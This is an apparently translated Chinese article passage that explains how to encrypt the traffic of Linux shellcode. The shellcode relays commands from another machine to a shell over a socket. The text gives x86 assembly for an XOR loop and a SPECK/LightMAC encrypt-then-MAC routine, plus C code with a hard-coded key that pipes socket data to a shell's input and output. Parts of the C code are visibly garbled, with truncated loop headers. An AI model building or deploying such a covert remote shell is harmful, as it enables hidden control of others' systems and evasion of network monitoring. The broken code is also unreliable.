分组密码有很多种,但AES 128可能是目前最适合对在线流量进行加密的算法了,下面给出的是我们对不同种类分组密码的测试结果:
接下来,我们实现一个针对数据流的简单异或操作(Just For Fun!)。下面的截图中显示的是一台Windows虚拟机发送给Linux虚拟机的部分命令,其中Linux平台运行的Shellcode是没有采用任何加密的。
给Shellcode x86汇编代码中添加部分命令后,我们就可以进行8位异或运算了:
; ; read(r, buf, BUFSIZ, 0); xor esi, esi ; esi = 0 mov ecx, edi ; ecx = buf cdq ; edx = 0 mov dl, BUFSIZ ; edx = BUFSIZ push SYS_read ; eax = SYS_read pop eax int 0x80 ; encrypt/decrypt buffer pushad xchg eax, ecxxor_loop: xor byte[eax+ecx-1], XOR_KEY loop xor_loop popad ; write(w, buf, len); xchg eax, edx ; edx = len mov al, SYS_write pop ebx ; s or in[1] int 0x80 jmp poll_wait
一开始,我使用的是下面这段代码来对数据包的加密进行验证,它使用了Encrypt-then-MAC (EtM),而且这种方法比其他的方法要更安全,比如说MAC-then-Encrypt (MtE) 或Encrypt-and-MAC(E&M):
bits32 %defineSPECK_RNDS 27%defineN 8%defineK 16 ;*****************************************;Light MAC parameters based on SPECK64-128;; N =64-bits; K =128-bits;%defineCOUNTER_LENGTH N/2 ; should be <= N/2%defineBLOCK_LENGTH N ; equal to N%defineTAG_LENGTH N ; >= 64-bits && <= N%defineBC_KEY_LENGTH K ; K %defineENCRYPT_BLK speck_encrypt%defineGET_MAC lightmac%defineLIGHTMAC_KEY_LENGTH BC_KEY_LENGTH*2 ; K*2 %definek0 edi %definek1 ebp %definek2 ecx %definek3 esi %definex0 ebx %definex1 edx ; esi= IN data; ebp= IN key speck_encrypt: pushad push esi ; save M lodsd ; x0 = x->w[0] xchg eax, x0 lodsd ; x1 = x->w[1] xchg eax, x1 mov esi, ebp ; esi = key lodsd xchg eax, k0 ; k0 = key[0] lodsd xchg eax, k1 ; k1 = key[1] lodsd xchg eax, k2 ; k2 = key[2] lodsd xchg eax, k3 ; k3 = key[3] xor eax, eax ; i = 0spk_el: ; x0 = (ROTR32(x0, 8) + x1) ^ k0; ror x0, 8 add x0, x1 xor x0, k0 ; x1 = ROTL32(x1, 3) ^ x0; rol x1, 3 xor x1, x0 ; k1 = (ROTR32(k1, 8) + k0) ^ i; ror k1, 8 add k1, k0 xor k1, eax ; k0 = ROTL32(k0, 3) ^ k1; rol k0, 3 xor k0, k1 xchg k3, k2 xchg k3, k1 ; i++ inc eax cmp al, SPECK_RNDS jnz spk_el pop edi xchg eax, x0 ; x->w[0] = x0 stosd xchg eax, x1 ; x->w[1] = x1 stosd popad ret ; edx= IN len; ebx= IN msg; ebp= IN key; edi= OUT tag lightmac: pushad mov ecx, edx xor edx, edx add ebp, BLOCK_LENGTH + BC_KEY_LENGTH pushad ; allocate N-bytes for M ; zero initialize T mov [edi+0], edx ; t->w[0] = 0; mov [edi+4], edx ; t->w[1] = 0; ; while we have msg datalmx_l0: mov esi, esp ; esi = M jecxz lmx_l2 ; exit loop ifmsglen == 0lmx_l1: ; add byte to M mov al, [ebx] ; al = *data++ inc ebx mov [esi+edx+COUNTER_LENGTH], al inc edx ; idx++ ; M filled? cmp dl, BLOCK_LENGTH - COUNTER_LENGTH ; --msglen loopne lmx_l1 jne lmx_l2 ; add S counter in big endian format inc dword[esp+_edx]; ctr++ mov eax, [esp+_edx] ; reset index cdq ; idx = 0 bswap eax ; m.ctr =SWAP32(ctr) mov [esi], eax ; encrypt M with E using K1 call ENCRYPT_BLK ; update T lodsd ; t->w[0] ^= m.w[0]; xor [edi+0], eax lodsd ; t->w[1] ^= m.w[1]; xor [edi+4], eax jmp lmx_l0 ; keep goinglmx_l2: ; add the end bit mov byte[esi+edx+COUNTER_LENGTH], 0x80 xchg esi, edi ; swap T and Mlmx_l3: ; update T with any msg dataremaining mov al, [edi+edx+COUNTER_LENGTH] xor [esi+edx], al dec edx jns lmx_l3 ; advance key to K2 add ebp, BC_KEY_LENGTH ; encrypt T with E using K2 call ENCRYPT_BLK popad ; release memory for M popad ; restore registers ret ; IN:ebp = global memory, edi = msg, ecx = enc flag, edx = msglen;OUT: -1 or length of data encrypted/decryptedencrypt: push -1 pop eax ; set return valueto -1 pushad lea ebp, [ebp+@ctx] ; ebp crypto ctx mov ebx, edi ; ebx = msg pushad ; allocate 8-bytes fortag+strm mov edi, esp ; edi = tag ; if (enc) { ; verify tag + decrypt jecxz enc_l0 ; msglen -= TAG_LENGTH; sub edx, TAG_LENGTH jle enc_l5 ; return -1 if msglen <= 0 mov [esp+_edx], edx ; GET_MAC(ctx, msg, msglen, mac); call GET_MAC ; memcmp(mac, &msg[msglen],TAG_LENGTH) lea esi, [ebx+edx] ; esi = &msg[msglen] cmpsd jnz enc_l5 ; not equal? return-1 cmpsd jnz enc_l5 ; ditto ; MACs are equal ; zero the MAC xor eax, eax mov [esi-4], eax mov [esi-8], eaxenc_l0: mov edi, esp test edx, edx ; exit if (msglen== 0) jz enc_lx ; memcpy (strm, ctx->e_ctr,BLOCK_LENGTH); mov esi, [esp+_ebp]; esi = ctx->e_ctr push edi movsd movsd mov ebp, esi pop esi ; ENCRYPT_BLK(ctx->e_key, &strm); call ENCRYPT_BLK mov cl, BLOCK_LENGTH ; r=(len > BLOCK_LENGTH) ?BLOCK_LENGTH : len;enc_l2: lodsb ; al = *strm++ xor [ebx], al ; *msg ^= al inc ebx ; msg++ dec edx loopnz enc_l2 ; while (!ZF&& --ecx) mov cl, BLOCK_LENGTH enc_l3: ; do { ; update counter mov ebp, [esp+_ebp] inc byte[ebp+ecx-1] loopz enc_l3 ; } while (ZF&& --ecx) jmp enc_l0enc_lx: ; encrypting? add MAC of ciphertext dec dword[esp+_ecx] mov edx, [esp+_edx] jz enc_l4 mov edi, ebx mov ebx, [esp+_ebx] mov ebp, [esp+_ebp] ; GET_MAC(ctx, buf, buflen, msg); call GET_MAC ; msglen += TAG_LENGTH; add edx, TAG_LENGTHenc_l4: ; return msglen; mov [esp+32+_eax], edx enc_l5: popad popad ret
#defineR(v,n)(((v)>>(n))|((v)<<(32-(n))))#defineF(n)for(i=0;i0;--r){ F(4) x=R(s[i],24), y=R(s[4+i],9), z=s[8+i], s[8+i]=x^(z+z)^((y&z)*4), s[4+i]=y^x^((x|z)*2), s[i]=z^y^((x&y)*8); t=r&3; if(!t) X(0,1),X(2,3), *s^=0x9e377900|r; if(t==2)X(0,2),X(1,3); }} typedefstruct _crypt_ctx { uint32_t idx; int fdr, fdw; uint8_t s[48]; uint8_t buf[BUFSIZ];}crypt_ctx; uint8_tgf_mul(uint8_t x) { return (x << 1) ^ ((x >> 7) *0x1b);} //initialize crypto contextvoidinit_crypt(crypt_ctx *c, int r, int w, void *key) { int i; c->fdr = r; c->fdw = w; for(i=0;i<48;i++) { c->s[i] = ((uint8_t*)key)[i % 16] ^gf_mul(i); } permute(c->s); c->idx = 0;} //encrypt or decrypt buffervoidcrypt(crypt_ctx *c) { int i, len; // read from socket or stdout len = read(c->fdr, c->buf, BUFSIZ); // encrypt/decrypt for(i=0;i idx >= 32) { permute(c->s); c->idx = 0; } c->buf[i] ^= c->s[c->idx++]; } // write to socket or stdin write(c->fdw, c->buf, len);}
在Linux Shell中使用这段代码之前,我们需要声明两个单独的加密上下文来处理输入、输出和128位的静态密钥:
//using a static 128-bit key crypt_ctx *c, c1, c2; // echo -n top_secret_key | openssl md5-binary -out key.bin // xxd -i key.bin uint8_t key[] = { 0x4f, 0xef, 0x5a, 0xcc, 0x15, 0x78, 0xf6,0x01, 0xee, 0xa1, 0x4e, 0x24, 0xf1, 0xac, 0xf9,0x49 };
// // c1 is for reading from socket andwriting to stdin init_crypt(&c1, s, in[1], key); // c2 is for reading from stdout andwriting to socket init_crypt(&c2, out[0], s, key); // now loop until user exits or someother error for (;;) { r = epoll_wait(efd, &evts, 1,-1); // error? bail out if (r<=0) break; // not input? bail out if (!(evts.events & EPOLLIN))break; fd = evts.data.fd; c = (fd == s) ? &c1 : &c2; crypt(c); }